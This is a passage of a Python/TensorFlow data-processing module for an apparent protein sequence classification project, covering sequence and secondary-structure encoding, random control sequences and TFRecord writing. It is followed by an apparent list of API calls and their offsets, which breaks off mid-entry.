20)) # pad the sequence to the boxsize: npad = ((0, self._opts._windowlength-length), (0, 0)) padded_seq_matrix = np.pad(oh_seq_matrix, pad_width=npad, mode='constant', constant_values=0) padded_seq_matrix = np.transpose(padded_seq_matrix) del oh_seq_matrix, seq_matrix return padded_seq_matrix, start_pos, length #true length 1 based else: print("Error: MODE must be of 'one_hot_padded'") def _get_structure(self, structure_str, seq_length): """Encodes the 2ndary strucure of a sequence. Construct a One Hot Encoded Tensor with height = self._structure_dims, width = self._windowlength Args: structure_str: A `str` object holding the structural information for a sequence. The entry in the dataset.csv corresponds to the FT fields in the swissprot textfile download. Example format: [('TURN', '11', '14'), ('HELIX', '19', '27'), ('STRAND', '32', '36'), ('HELIX', '45', '54'), ('STRAND', '59', '69'), ('STRAND', '72', '80'), ('HELIX', '86', '96'), ('HELIX', '99', '112'), ('HELIX', '118', '123'), ('HELIX', '129', '131'), ('HELIX', '134', '143'), ('STRAND', '146', '149'), ('HELIX', '150', '156'), ('STRAND', '157', '159'), ('HELIX', '173', '182'), ('STRAND', '186', '189'), ('HELIX', '192', '194'), ('HELIX', '199', '211'), ('STRAND', '216', '221'), ('HELIX', '226', '239'), ('STRAND', '242', '246'), ('HELIX', '272', '275'), ('HELIX', '277', '279'), ('STRAND', '283', '285')] Returns: padded_structure_matrix: A `Tensor`, of shape [structure_dims, windowlength] holding the structure info. """ # if there is info about the structure: if structure_str != '[]': # get an array of len length: structure = np.ones([seq_length]) # modify the structure str: # TODO: Improve the super ugly hack with a proper regex structure_str = re.sub('[\'\[\]\(]', '', structure_str) structure_features = [j.strip(', ').split(', ') for j in structure_str.strip(')').split(')')] for ft in structure_features: # get the ID for the ft: id_to_write = self.structure_dict[ft[0]] start = int(ft[1]) end = int(ft[2]) for i in range(start, end+1): structure[i] = id_to_write npad = ((0, self._opts._windowlength-seq_length)) padded_structure_matrix = np.pad(structure, pad_width=npad, mode='constant', constant_values=0) else: # return only zeros if there is no information about the structure padded_structure_matrix = np.zeros([self._opts._windowlength]) return padded_structure_matrix def _process_csv(self, queue): """Iterate over a dataset.csv and process the samples. Takes the path to a file and processes the samples a sample at a time whenever the function is called. Args: queue: `str` the file_path to the dataset.csv. The csv file should be in the form of: name,seq,labels. return_name: `bool` whether to return the sequence name or not. Defaults to True. encode_labels: `bool` whether to return the encoded labels or the raw str. Defaults to True. Returns: Depending on return_name either (if true): name: A `str` holding the sample name. label: A `Tensor` holding the one-hot encoded labels (depending on encode_labels, otherwise raw labels). seq_matrix: A `Tensor` holding the one-hot encoded sequence. start_pos: A `Tensor` holding the start pos of the sequence in the window (defaults to 0). end_pos: A `Tensor` holding the end pos of the sequence in the window. OR label: A `Tensor` holding the one-hot encoded labels (depending on encode_labels, otherwise raw labels). seq_matrix: A `Tensor` holding the one-hot encoded sequence. start_pos: A `Tensor` holding the start pos of the sequence in the window (defaults to 0). end_pos: A `Tensor` holding the end pos of the sequence in the window. """ _, seq, labels, structure_str = self._csv_EC_decoder(queue) seq_matrix, start_pos, length = self._seq2tensor(seq) try: structure_tensor = self._get_structure(structure_str, length) except KeyError: structure_tensor = 'no_stucture_defined' # encode the label one_hot: oh_label_tensor = self.label_enc.fit_transform(labels) # of shape [1, n_classes] classes = oh_label_tensor.shape[0] # open an array full of zeros to add the labels to oh_labels = np.zeros(self._opts._nclasses) for c in range(classes): oh_labels += oh_label_tensor[c] oh_labels = np.expand_dims(oh_labels, axis=0) return oh_labels, seq_matrix, structure_tensor, start_pos, length def generate_garbage_sequence(self): """Generate a garbage sequence. Generates a sequence full of garbage, e.g. a obviously non functional sequence. Used to test the robustness of the model precision. Args: return_name: A `bool`, if True return the garbage sequene along wih a generated name. Returns: name: A `str` holding the sample name (if return_name is True). padded_seq: A `Tensor` holding the one-hot encoded and padded (to windowlength) garbage sequence. label: A `Tensor` holding the one-hot encoded labels (depending on encode_labels, otherwise raw labels). The labels of a garbage sequence are a zeros Tensor. garbage_label: A `Tensor` holding the garbage label (binary, either 1 for garbage or 0 for valid sequence). """ modes = ['complete_random', 'pattern', 'same'] mode = modes[random.randint(0, 2)] # get the length of the protein length = random.randint(175, self._opts._windowlength-1) if mode == 'pattern': #print('pattern') # Generate a repetitive pattern of 5 AminoAcids to generate the prot # get a random nr of AAs to generate the pattern: AA_nr = random.randint(2, 5) # get an index for each AA in AA_nr idxs = [] for aa in range(AA_nr): idx_found = False while not idx_found: aa_idx = random.randint(0, 19) if not aa_idx in idxs: idxs.append(aa_idx) idx_found = True reps = math.ceil(length/AA_nr) seq = reps * idxs length = len(seq) elif mode == 'complete_random': # print('complete_random') seq = [] for aa in range(length): # get an idx for every pos in length: idx = random.randint(0, 19) seq.append(idx) elif mode == 'same': # print('ONE') AA = random.randint(0, 19) seq = length * [AA] label = np.zeros([self._opts._nclasses]) label = np.expand_dims(label, axis=0) garbage_label = np.asarray([1]) garbage_label = np.expand_dims(garbage_label, axis=0) oh_seq_matrix = np.reshape(self.AA_enc.fit_transform(np.reshape(seq, (1, -1))), (len(seq), 20)) # pad the sequence to the boxsize: npad = ((0, self._opts._windowlength-length), (0, 0)) padded_seq_matrix = np.pad(oh_seq_matrix, pad_width=npad, mode='constant', constant_values=0) padded_seq = np.transpose(padded_seq_matrix) return padded_seq, label, garbage_label def _bytes_feature(self, value): return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value])) def _float_feature(self, value): return tf.train.Feature(bytes_list=tf.train.FloatList(value=[value])) def _int64_feature(self, value): return tf.train.Feature(int64_list=tf.train.Int64List(value=[value])) def example_to_TFrecords(self, is_train, garbage_percentage=0.2, structure=True): """Convert a dataset.csv into tf.Records format. This function reads the dataset files specified in the config dict and generates examples files in tf.Records format in the batches_dir folder specified in the config dict Args: is_train: A `bool` defining which dataset file to use (true: train, false: valid). garbage_percentage: A `float` defining the percentage of garbage to add to the tf.records files. structure: A `bool` whether to include structural information in the records or not. """ include_garbage = False if garbage_percentage == 0 else True # determine how many files we need to write: if is_train: length_data_set = _count_lines(self._opts._traindata) batch_files_name = os.path.basename(self._opts._traindata) + \ 'train_batch_{}'.format(str(self._opts._windowlength)) print(batch_files_name) in_csv = self.traindata else: length_data_set = _count_lines(self._opts._validdata) batch_files_name = os.path.basename(self._opts._validdata) + \ 'valid_batch_{}'.format(str(self._opts._windowlength)) print(batch_files_name) in_csv = self.validdata files_to_write = np.int32(np.ceil(length_data_set*(1+garbage_percentage) / float(self.examples_per_file))) # write every thing twice for n in range(1, files_to_write+1): file_path = os.path.join(self._opts._batchesdir, batch_files_name) + '_' + str(n) self.writer = tf.python_io.TFRecordWriter(file_path) if structure: for i in range(self.examples_per_file): if include_garbage and i % int(1/garbage_percentage) == 0: # print("garbage_seq") seq_tensor, label, garbage_label = self.generate_garbage_sequence() structure_label = np.zeros([self._opts._windowlength]) assert seq_tensor.shape == (self._opts._depth, self._opts._windowlength), \ "%s" % str(seq_tensor.shape) assert label.shape == (1, self._opts._nclasses) # convert the features to a raw string: seq_raw = seq_tensor.tostring() label_raw = label.tostring() garbage_label_raw = garbage_label.tostring() structure_label_raw = structure_label.tostring() example = tf.train.Example( features=tf.train.Features(feature={ 'windowlength': self._int64_feature(self._opts._windowlength), 'structure_depth': self._int64_feature(self._opts._structuredims), 'depth': self._int64_feature(self._opts._depth), 'label_classes': self._int64_feature(self._opts._nclasses), 'seq_raw': self._bytes_feature(seq_raw), 'label_raw': self._bytes_feature(label_raw), 'garbage_label_raw': self._bytes_feature(garbage_label_raw), 'structure_label_raw': self._bytes_feature(structure_label_raw), })) self.writer.write(example.SerializeToString()) else: # print("validseq") try: oh_labels, seq_tensor, structure_label, _, _ = self._process_csv(in_csv) except IndexError: # catches error from csv_decoder -> reopen the file: in_csv.close() if is_train: self.traindata = open(self._opts._traindata, 'r') in_csv = self.traindata else: self.validdata = open(self._opts._validdata, 'r') in_csv = self.validdata oh_labels, seq_tensor, structure_label, _, _ = self._process_csv(in_csv) garbage_label = np.asarray([0]) # NOT garbage garbage_label = np.expand_dims(garbage_label, axis=0) assert seq_tensor.shape == (self._opts._depth, self._opts._windowlength) assert oh_labels.shape == (1, self._opts._nclasses) # convert the features to a raw string: seq_raw = seq_tensor.tostring() label_raw = oh_labels.tostring() garbage_label_raw = garbage_label.tostring() structure_label_raw = structure_label.tostring() example = tf.train.Example( features=tf.train.Features(feature={ 'windowlength': self._int64_feature(self._opts._windowlength), 'structure_depth': self._int64_feature(self._opts._structuredims), 'depth': self._int64_feature(self._opts._depth), 'label_classes': self._int64_feature(self._opts._nclasses), 'seq_raw': self._bytes_feature(seq_raw), 'label_raw': self._bytes_feature(label_raw), 'garbage_label_raw': self._bytes_feature(garbage_label_raw), 'structure_label_raw': self._bytes_feature(structure_label_raw), })) self.writer.write(example.SerializeToString()) elif not structure: for i in range(self.examples_per_file): if include_garbage and i % int(1/garbage_percentage) == 0: # print("garbage_seq") assert seq_tensor.shape == (self._opts._depth, self._opts._windowlength),\ "%s" % str(seq_tensor.shape) assert label.shape == (1, self._opts._nclasses) # convert the features to a raw string: seq_raw = seq_tensor.tostring() label_raw = label.tostring() example = tf.train.Example( features=tf.train.Features(feature={ 'windowlength': self._int64_feature(self._opts._windowlength), 'depth': self._int64_feature(self._opts._depth), 'label_classes': self._int64_feature(self._opts._nclasses), 'seq_raw': self._bytes_feature(seq_raw), 'label_raw': self._bytes_feature(label_raw), })) self.writer.write(example.SerializeToString()) else: # print("validseq") try: oh_labels, seq_tensor, _, _, _ = self._process_csv(in_csv) except IndexError: # catches error from csv_decoder -> reopen the file: in_csv.close() if is_train: self.traindata = open(self._opts._traindata, 'r') in_csv = self.traindata else: self.validdata = open(self._opts._validdata, 'r') in_csv = self.validdata oh_labels, seq_tensor, _, _, _ = self._process_csv(in_csv) assert seq_tensor.shape == (self._opts._depth, self._opts._windowlength) assert oh_labels.shape == (1, self._opts._nclasses) # convert the features to a raw string: seq_raw = seq_tensor.tostring() label_raw = oh_labels.tostring() example = tf.train.Example( features=tf.train.Features(feature={ 'windowlength': self._int64_feature(self._opts._windowlength), 'depth': self._int64_feature(self._opts._depth), 'label_classes': self._int64_feature(self._opts._nclasses), 'seq_raw': self._bytes_feature(seq_raw), 'label_raw': self._bytes_feature(label_raw), })) self.writer.write(example.SerializeToString()) self.writer.close() def produce_train_valid(self): """Highlevel wrapper for the example_to_TF_records function.""" assert self.mode.startswith('one_hot'), "mode must be 'one_hot_padded'" self.example_to_TFrecords(is_train=True, garbage_percentage=0, structure=False) self.example_to_TFrecords(is_train=False, garbage_percentage=0, structure=False) def plot_histogram(log_file, save_dir): """Simple plotting function to plot a hist from a specified file containing counts per labels. Args: log_file: A `str` to the file containing the histogram data. """ count_dict = {} with open(log_file, "r") as in_fobj: for line in in_fobj: pred_labels = line.strip().split() for label in pred_labels: try: count_dict[label] += 1 except KeyError: count_dict[label] = 0 bars = [count_dict[label] for label in count_dict.keys()] labels = [label for label in count_dict.keys()] set_style("whitegrid") fig, ax = plt.subplots() ax = barplot(x=bars, y=labels) fig.save(os.path.join(save_dir, 'negative_test.png')) def _add_var_summary(var, name, collection=None): """Attaches a lot of summaries to a given tensor. Args: var: A `Tensor`, for which to calculate the summaries. name: `str`, the name of the Tensor. collection: `str` the collection to which to add the summary. Defaults to None. """ with tf.name_scope(name): with tf.name_scope('summaries'): mean = tf.reduce_mean(var) tf.summary.scalar('mean', mean, collections=collection) with tf.name_scope('stddev'): stddev = tf.sqrt(tf.reduce_mean(tf.square(var - mean))) tf.summary.scalar('stddev', stddev, collections=collection) tf.summary.scalar('max', tf.reduce_max(var), collections=collection) tf.summary.scalar('min', tf.reduce_min(var), collections=collection) tf.summary.histogram('histogram', var, collections=collection) def _variable_on_cpu(name, shape, initializer, trainable): """Helper function to get a variable stored on cpu. Args: name: A `str` holding the name of the variable. shape: An `Array` defining the shape of the Variable. For example: [2,1,3]. initializer: The `tf.Initializer` to use to initialize the variable. trainable: A `bool` stating wheter the variable is trainable or not. Returns: A `tf.Variable` on CPU. """ with tf.device('/cpu:0'): #TODO will this work? dtype = tf.float32 var = tf.get_variable(name, shape, initializer=initializer, dtype=dtype, trainable=trainable) #dtf.add_to_collection('CPU', var) return var def softmax(X, theta = 1.0, axis = None): """Compute the softmax of each element along an axis of X. Args: X: `ND-Array`, Probably should be floats. theta: float parameter, used as a multiplier prior to exponentiation. Default = 1.0 (optional). axis: axis to compute values along. Default is the first non-singleton axis (optional). Returns: An `Array` of same shape as X. The result will sum to 1 along the specified axis. """ # make X at least 2d y = np.atleast_2d(X) # find axis if axis is None: axis = next(j[0] for j in enumerate(y.shape) if j[1] > 1) # multiply y against the theta parameter, y = y * float(theta) # subtract the max for numerical stability y = y - np.expand_dims(np.max(y, axis = axis), axis) # exponentiate y y = np.exp(y) # take the sum along the specified axis ax_sum = np.expand_dims(np.sum(y, axis = axis), axis) # finally: divide elementwise p = y / ax_sum # flatten if X was 1D if len(X.shape) == 1: p = p.flatten() return p def untar(file): """Untar a file in the current wd. Args: file: A str specifying the filepath """ try: tar = tarfile.open(fname) tar.extractall() tar.close() except: print('ERROR: File is not a .tar.gz, or does not exist.')
[ "tarfile.open", "tensorflow.get_variable", "matplotlib.pyplot.ylabel", "tensorflow.train.Int64List", "seaborn.set_style", "tensorflow.reduce_mean", "tensorflow.cast", "numpy.atleast_2d", "numpy.greater", "numpy.mean", "tensorflow.random_normal", "os.path.exists", "numpy.multiply", "numpy.reshape", "tensorflow.reduce_min", "matplotlib.pyplot.xlabel", "matplotlib.pyplot.plot", "numpy.asarray", "numpy.max", "numpy.exp", "matplotlib.pyplot.close", "numpy.stack", "os.mkdir", "numpy.concatenate", "tensorflow.python_io.TFRecordWriter", "tensorflow.train.FloatList", "matplotlib.pyplot.ylim", "numpy.maximum", "tensorflow.summary.scalar", "tensorflow.square", "random.randint", "tensorflow.stack", "tensorflow.device", "collections.OrderedDict", "matplotlib.pyplot.savefig", "numpy.amin", "numpy.ones", "numpy.float32", "matplotlib.use", "matplotlib.pyplot.ioff", "tensorflow.train.BytesList", "tensorflow.reduce_max", "tensorflow.summary.histogram", "matplotlib.pyplot.title", "matplotlib.pyplot.xlim", "numpy.transpose", "re.sub", "matplotlib.pyplot.legend", "math.ceil", "os.makedirs", "sklearn.preprocessing.OneHotEncoder", "matplotlib.font_manager.FontProperties", "os.path.join", "numpy.sum", "numpy.zeros", "matplotlib.pyplot.figure", "numpy.pad", "numpy.ndarray", "numpy.expand_dims", "tensorflow.name_scope", "numpy.random.randint", "tensorflow.constant", "seaborn.barplot", "os.path.basename", "numpy.amax", "matplotlib.pyplot.subplots", "json.dump" ]
[((18, 39), 'matplotlib.use', 'matplotlib.use', (['"""Agg"""'], {}), "('Agg')\n", (32, 39), False, 'import matplotlib\n'), ((67773, 67795), 'seaborn.set_style', 'set_style', (['"""whitegrid"""'], {}), "('whitegrid')\n", (67782, 67795), False, 'from seaborn import barplot, set_style\n'), ((67810, 67824), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {}), '()\n', (67822, 67824), True, 'import matplotlib.pyplot as plt\n'), ((67834, 67859), 'seaborn.barplot', 'barplot', ([], {'x': 'bars', 'y': 'labels'}), '(x=bars, y=labels)\n', (67841, 67859), False, 'from seaborn import barplot, set_style\n'), ((70053, 70069), 'numpy.atleast_2d', 'np.atleast_2d', (['X'], {}), '(X)\n', (70066, 70069), True, 'import numpy as np\n'), ((70377, 70386), 'numpy.exp', 'np.exp', (['y'], {}), '(y)\n', (70383, 70386), True, 'import numpy as np\n'), ((7012, 7061), 'os.path.join', 'os.path.join', (['self._opts._summariesdir', '"""metrics"""'], {}), "(self._opts._summariesdir, 'metrics')\n", (7024, 7061), False, 'import re, os\n'), ((7329, 7359), 'numpy.zeros', 'np.zeros', (['self._opts._nclasses'], {}), '(self._opts._nclasses)\n', (7337, 7359), True, 'import numpy as np\n'), ((7396, 7426), 'numpy.zeros', 'np.zeros', (['self._opts._nclasses'], {}), '(self._opts._nclasses)\n', (7404, 7426), True, 'import numpy as np\n'), ((7460, 7490), 'numpy.zeros', 'np.zeros', (['self._opts._nclasses'], {}), '(self._opts._nclasses)\n', (7468, 7490), True, 'import numpy as np\n'), ((8559, 8590), 'numpy.greater', 'np.greater', (['sigmoid_logits', '(0.5)'], {}), '(sigmoid_logits, 0.5)\n', (8569, 8590), True, 'import numpy as np\n'), ((8688, 8726), 'numpy.sum', 'np.sum', (['batch_predicted_labels'], {'axis': '(0)'}), '(batch_predicted_labels, axis=0)\n', (8694, 8726), True, 'import numpy as np\n'), ((8801, 8828), 'numpy.sum', 'np.sum', (['true_labels'], {'axis': '(0)'}), '(true_labels, axis=0)\n', (8807, 8828), True, 'import numpy as np\n'), ((10045, 10083), 'numpy.concatenate', 'np.concatenate', (['self.roc_score'], {'axis': '(0)'}), '(self.roc_score, axis=0)\n', (10059, 10083), True, 'import numpy as np\n'), ((10110, 10149), 'numpy.concatenate', 'np.concatenate', (['self.roc_labels'], {'axis': '(0)'}), '(self.roc_labels, axis=0)\n', (10124, 10149), True, 'import numpy as np\n'), ((10950, 10973), 'numpy.mean', 'np.mean', (['scores'], {'axis': '(0)'}), '(scores, axis=0)\n', (10957, 10973), True, 'import numpy as np\n'), ((11055, 11078), 'numpy.amax', 'np.amax', (['scores'], {'axis': '(0)'}), '(scores, axis=0)\n', (11062, 11078), True, 'import numpy as np\n'), ((11159, 11182), 'numpy.amin', 'np.amin', (['scores'], {'axis': '(0)'}), '(scores, axis=0)\n', (11166, 11182), True, 'import numpy as np\n'), ((13273, 13303), 'numpy.zeros', 'np.zeros', (['self._opts._nclasses'], {}), '(self._opts._nclasses)\n', (13281, 13303), True, 'import numpy as np\n'), ((13340, 13370), 'numpy.zeros', 'np.zeros', (['self._opts._nclasses'], {}), '(self._opts._nclasses)\n', (13348, 13370), True, 'import numpy as np\n'), ((14127, 14137), 'matplotlib.pyplot.ioff', 'plt.ioff', ([], {}), '()\n', (14135, 14137), True, 'import matplotlib.pyplot as plt\n'), ((14152, 14190), 'matplotlib.pyplot.figure', 'plt.figure', (['(1)'], {'figsize': '(5, 5)', 'dpi': '(200)'}), '(1, figsize=(5, 5), dpi=200)\n', (14162, 14190), True, 'import matplotlib.pyplot as plt\n'), ((14199, 14250), 'matplotlib.pyplot.plot', 'plt.plot', (['x', 'y'], {'color': '"""#005493"""', 'lw': '(2)', 'label': 'legend'}), "(x, y, color='#005493', lw=2, label=legend)\n", (14207, 14250), True, 'import matplotlib.pyplot as plt\n'), ((14362, 14382), 'matplotlib.pyplot.xlim', 'plt.xlim', (['[0.0, 1.0]'], {}), '([0.0, 1.0])\n', (14370, 14382), True, 'import matplotlib.pyplot as plt\n'), ((14391, 14412), 'matplotlib.pyplot.ylim', 'plt.ylim', (['[0.0, 1.05]'], {}), '([0.0, 1.05])\n', (14399, 14412), True, 'import matplotlib.pyplot as plt\n'), ((14815, 14845), 'matplotlib.pyplot.savefig', 'plt.savefig', (["(filename + '.svg')"], {}), "(filename + '.svg')\n", (14826, 14845), True, 'import matplotlib.pyplot as plt\n'), ((14852, 14882), 'matplotlib.pyplot.savefig', 'plt.savefig', (["(filename + '.png')"], {}), "(filename + '.png')\n", (14863, 14882), True, 'import matplotlib.pyplot as plt\n'), ((14889, 14903), 'matplotlib.pyplot.close', 'plt.close', (['fig'], {}), '(fig)\n', (14898, 14903), True, 'import matplotlib.pyplot as plt\n'), ((17611, 17624), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (17622, 17624), False, 'from collections import OrderedDict\n'), ((17652, 17665), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (17663, 17665), False, 'from collections import OrderedDict\n'), ((17727, 17740), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (17738, 17740), False, 'from collections import OrderedDict\n'), ((18597, 18655), 'sklearn.preprocessing.OneHotEncoder', 'OneHotEncoder', ([], {'n_values': 'self._opts._nclasses', 'sparse': '(False)'}), '(n_values=self._opts._nclasses, sparse=False)\n', (18610, 18655), False, 'from sklearn.preprocessing import OneHotEncoder\n'), ((30565, 30615), 'random.randint', 'random.randint', (['(175)', '(self._opts._windowlength - 10)'], {}), '(175, self._opts._windowlength - 10)\n', (30579, 30615), False, 'import random\n'), ((31748, 31780), 'numpy.zeros', 'np.zeros', (['[self._opts._nclasses]'], {}), '([self._opts._nclasses])\n', (31756, 31780), True, 'import numpy as np\n'), ((31797, 31826), 'numpy.expand_dims', 'np.expand_dims', (['label'], {'axis': '(0)'}), '(label, axis=0)\n', (31811, 31826), True, 'import numpy as np\n'), ((31851, 31866), 'numpy.asarray', 'np.asarray', (['[1]'], {}), '([1])\n', (31861, 31866), True, 'import numpy as np\n'), ((31891, 31928), 'numpy.expand_dims', 'np.expand_dims', (['garbage_label'], {'axis': '(0)'}), '(garbage_label, axis=0)\n', (31905, 31928), True, 'import numpy as np\n'), ((32166, 32239), 'numpy.pad', 'np.pad', (['oh_seq_matrix'], {'pad_width': 'npad', 'mode': '"""constant"""', 'constant_values': '(0)'}), "(oh_seq_matrix, pad_width=npad, mode='constant', constant_values=0)\n", (32172, 32239), True, 'import numpy as np\n'), ((32261, 32292), 'numpy.transpose', 'np.transpose', (['padded_seq_matrix'], {}), '(padded_seq_matrix)\n', (32273, 32292), True, 'import numpy as np\n'), ((33038, 33139), 'tensorflow.random_normal', 'tf.random_normal', (['[self._opts._batchsize, self._opts._embeddingdim, self._opts._windowlength, 1]'], {}), '([self._opts._batchsize, self._opts._embeddingdim, self.\n _opts._windowlength, 1])\n', (33054, 33139), True, 'import tensorflow as tf\n'), ((33376, 33397), 'tensorflow.stack', 'tf.stack', (['index_batch'], {}), '(index_batch)\n', (33384, 33397), True, 'import tensorflow as tf\n'), ((34314, 34352), 'numpy.ndarray', 'np.ndarray', (['[self._opts._batchsize, 2]'], {}), '([self._opts._batchsize, 2])\n', (34324, 34352), True, 'import numpy as np\n'), ((34371, 34406), 'numpy.ndarray', 'np.ndarray', (['[self._opts._batchsize]'], {}), '([self._opts._batchsize])\n', (34381, 34406), True, 'import numpy as np\n'), ((35866, 35895), 'numpy.stack', 'np.stack', (['seq_tensors'], {'axis': '(0)'}), '(seq_tensors, axis=0)\n', (35874, 35895), True, 'import numpy as np\n'), ((37789, 37820), 'numpy.stack', 'np.stack', (['labels_tensor'], {'axis': '(0)'}), '(labels_tensor, axis=0)\n', (37797, 37820), True, 'import numpy as np\n'), ((37875, 37904), 'numpy.stack', 'np.stack', (['seq_tensors'], {'axis': '(0)'}), '(seq_tensors, axis=0)\n', (37883, 37904), True, 'import numpy as np\n'), ((37921, 37951), 'numpy.expand_dims', 'np.expand_dims', (['batch'], {'axis': '(-1)'}), '(batch, axis=-1)\n', (37935, 37951), True, 'import numpy as np\n'), ((41384, 41413), 'numpy.stack', 'np.stack', (['seq_tensors'], {'axis': '(0)'}), '(seq_tensors, axis=0)\n', (41392, 41413), True, 'import numpy as np\n'), ((41430, 41460), 'numpy.expand_dims', 'np.expand_dims', (['batch'], {'axis': '(-1)'}), '(batch, axis=-1)\n', (41444, 41460), True, 'import numpy as np\n'), ((42903, 42961), 'sklearn.preprocessing.OneHotEncoder', 'OneHotEncoder', ([], {'n_values': 'self._opts._nclasses', 'sparse': '(False)'}), '(n_values=self._opts._nclasses, sparse=False)\n', (42916, 42961), False, 'from sklearn.preprocessing import OneHotEncoder\n'), ((54337, 54367), 'numpy.zeros', 'np.zeros', (['self._opts._nclasses'], {}), '(self._opts._nclasses)\n', (54345, 54367), True, 'import numpy as np\n'), ((54466, 54499), 'numpy.expand_dims', 'np.expand_dims', (['oh_labels'], {'axis': '(0)'}), '(oh_labels, axis=0)\n', (54480, 54499), True, 'import numpy as np\n'), ((55582, 55631), 'random.randint', 'random.randint', (['(175)', '(self._opts._windowlength - 1)'], {}), '(175, self._opts._windowlength - 1)\n', (55596, 55631), False, 'import random\n'), ((56747, 56779), 'numpy.zeros', 'np.zeros', (['[self._opts._nclasses]'], {}), '([self._opts._nclasses])\n', (56755, 56779), True, 'import numpy as np\n'), ((56796, 56825), 'numpy.expand_dims', 'np.expand_dims', (['label'], {'axis': '(0)'}), '(label, axis=0)\n', (56810, 56825), True, 'import numpy as np\n'), ((56850, 56865), 'numpy.asarray', 'np.asarray', (['[1]'], {}), '([1])\n', (56860, 56865), True, 'import numpy as np\n'), ((56890, 56927), 'numpy.expand_dims', 'np.expand_dims', (['garbage_label'], {'axis': '(0)'}), '(garbage_label, axis=0)\n', (56904, 56927), True, 'import numpy as np\n'), ((57165, 57238), 'numpy.pad', 'np.pad', (['oh_seq_matrix'], {'pad_width': 'npad', 'mode': '"""constant"""', 'constant_values': '(0)'}), "(oh_seq_matrix, pad_width=npad, mode='constant', constant_values=0)\n", (57171, 57238), True, 'import numpy as np\n'), ((57260, 57291), 'numpy.transpose', 'np.transpose', (['padded_seq_matrix'], {}), '(padded_seq_matrix)\n', (57272, 57291), True, 'import numpy as np\n'), ((67873, 67916), 'os.path.join', 'os.path.join', (['save_dir', '"""negative_test.png"""'], {}), "(save_dir, 'negative_test.png')\n", (67885, 67916), False, 'import re, os\n'), ((68242, 68261), 'tensorflow.name_scope', 'tf.name_scope', (['name'], {}), '(name)\n', (68255, 68261), True, 'import tensorflow as tf\n'), ((69309, 69328), 'tensorflow.device', 'tf.device', (['"""/cpu:0"""'], {}), "('/cpu:0')\n", (69318, 69328), True, 'import tensorflow as tf\n'), ((69393, 69484), 'tensorflow.get_variable', 'tf.get_variable', (['name', 'shape'], {'initializer': 'initializer', 'dtype': 'dtype', 'trainable': 'trainable'}), '(name, shape, initializer=initializer, dtype=dtype,\n trainable=trainable)\n', (69408, 69484), True, 'import tensorflow as tf\n'), ((70459, 70479), 'numpy.sum', 'np.sum', (['y'], {'axis': 'axis'}), '(y, axis=axis)\n', (70465, 70479), True, 'import numpy as np\n'), ((70764, 70783), 'tarfile.open', 'tarfile.open', (['fname'], {}), '(fname)\n', (70776, 70783), False, 'import tarfile\n'), ((5562, 5596), 'os.path.exists', 'os.path.exists', (['self._summariesdir'], {}), '(self._summariesdir)\n', (5576, 5596), False, 'import re, os\n'), ((5610, 5641), 'os.makedirs', 'os.makedirs', (['self._summariesdir'], {}), '(self._summariesdir)\n', (5621, 5641), False, 'import re, os\n'), ((5657, 5689), 'os.path.exists', 'os.path.exists', (['self._batchesdir'], {}), '(self._batchesdir)\n', (5671, 5689), False, 'import re, os\n'), ((5703, 5732), 'os.makedirs', 'os.makedirs', (['self._batchesdir'], {}), '(self._batchesdir)\n', (5714, 5732), False, 'import re, os\n'), ((5935, 5970), 'json.dump', 'json.dump', (['self.config', 'config_dict'], {}), '(self.config, config_dict)\n', (5944, 5970), False, 'import json\n'), ((7077, 7110), 'os.path.exists', 'os.path.exists', (['self.metrics_path'], {}), '(self.metrics_path)\n', (7091, 7110), False, 'import re, os\n'), ((7124, 7151), 'os.mkdir', 'os.mkdir', (['self.metrics_path'], {}), '(self.metrics_path)\n', (7132, 7151), False, 'import re, os\n'), ((7185, 7231), 'os.path.join', 'os.path.join', (['self.metrics_path', '"""metrics.csv"""'], {}), "(self.metrics_path, 'metrics.csv')\n", (7197, 7231), False, 'import re, os\n'), ((7705, 7814), 'matplotlib.font_manager.FontProperties', 'font_manager.FontProperties', ([], {'fname': '"""/net/data.isilon/igem/2017/data/cache/fonts/JosefinSans-Regular.tff"""'}), "(fname=\n '/net/data.isilon/igem/2017/data/cache/fonts/JosefinSans-Regular.tff')\n", (7732, 7814), False, 'from matplotlib import font_manager\n'), ((7857, 7968), 'matplotlib.font_manager.FontProperties', 'font_manager.FontProperties', ([], {'fname': '"""/net/data.isilon/igem/2017/data/cache/fonts/DroidSansMono-Regular.ttf"""'}), "(fname=\n '/net/data.isilon/igem/2017/data/cache/fonts/DroidSansMono-Regular.ttf')\n", (7884, 7968), False, 'from matplotlib import font_manager\n'), ((8948, 8996), 'numpy.multiply', 'np.multiply', (['batch_predicted_labels', 'true_labels'], {}), '(batch_predicted_labels, true_labels)\n', (8959, 8996), True, 'import numpy as np\n'), ((9855, 9901), 'os.path.join', 'os.path.join', (['self.metrics_path', '"""metrics.csv"""'], {}), "(self.metrics_path, 'metrics.csv')\n", (9867, 9901), False, 'import re, os\n'), ((11604, 11642), 'numpy.maximum', 'np.maximum', (['(1)', 'self.pred_positives_sum'], {}), '(1, self.pred_positives_sum)\n', (11614, 11642), True, 'import numpy as np\n'), ((11750, 11790), 'numpy.maximum', 'np.maximum', (['(1)', 'self.actual_positives_sum'], {}), '(1, self.actual_positives_sum)\n', (11760, 11790), True, 'import numpy as np\n'), ((11811, 11841), 'numpy.sum', 'np.sum', (['self.true_positive_sum'], {}), '(self.true_positive_sum)\n', (11817, 11841), True, 'import numpy as np\n'), ((11844, 11875), 'numpy.sum', 'np.sum', (['self.pred_positives_sum'], {}), '(self.pred_positives_sum)\n', (11850, 11875), True, 'import numpy as np\n'), ((11893, 11923), 'numpy.sum', 'np.sum', (['self.true_positive_sum'], {}), '(self.true_positive_sum)\n', (11899, 11923), True, 'import numpy as np\n'), ((11926, 11959), 'numpy.sum', 'np.sum', (['self.actual_positives_sum'], {}), '(self.actual_positives_sum)\n', (11932, 11959), True, 'import numpy as np\n'), ((14290, 14353), 'matplotlib.pyplot.plot', 'plt.plot', (['[0, 1]', '[0, 1]'], {'color': '"""#B9B9B9"""', 'lw': '(2)', 'linestyle': '"""--"""'}), "([0, 1], [0, 1], color='#B9B9B9', lw=2, linestyle='--')\n", (14298, 14353), True, 'import matplotlib.pyplot as plt\n'), ((14448, 14490), 'matplotlib.pyplot.title', 'plt.title', (['title'], {'fontproperties': 'self.font'}), '(title, fontproperties=self.font)\n', (14457, 14490), True, 'import matplotlib.pyplot as plt\n'), ((14503, 14546), 